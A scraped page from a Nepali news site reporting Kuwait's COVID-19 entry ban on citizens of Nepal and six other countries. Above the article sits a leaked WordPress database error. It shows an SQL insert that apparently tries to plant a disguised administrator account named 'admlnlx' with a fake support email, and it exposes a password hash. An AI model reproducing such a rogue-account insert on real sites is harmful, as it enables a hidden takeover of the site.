WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B9WMw0rf7igxz5fQ62.EOSB4Gbkfwt.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 17:14:43', '', 'admlnlx', 'admlnlx')

कुवेतमा नेपाली सहित सात देशका नागरिकलाई प्रवेशमा रोक – Gaule Khabar

कुवेतमा नेपाली सहित सात देशका नागरिकलाई प्रवेशमा रोक

कुवेतमा नेपाली सहित सात देशका नागरिकलाई प्रवेशमा रोक

गाउँले न्युज, काठमाडौं । (कोभिड १९) कोरोनाको संक्रमणको कारण देखाउदै नेपाली सहित सात देशका नागरिकलाई कुवेत प्रवेशमा रोक लगाइएको छ ।
कुवेत सरकारले १ अगष्टदेखि नेपाल, भारत, पाकिस्तान, बंगलादेश, श्रीलंका, इरान र फिलिपिन्सका नागरिकलाई प्रबेशमा रोक लगाएको हो ।
कोरोना संक्रमणलाई मध्यनजर गर्दै कुवेत सरकारले बिहीबार यस्तो निर्णय गरेको जनाइएको छ । कुवेतमा करिब साढे तीन महिनासम्म बन्द रहेका अन्तर्राष्ट्रिय हवाई सेवा एक अगष्टदेखि फेरि सुरु हुँदैछ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका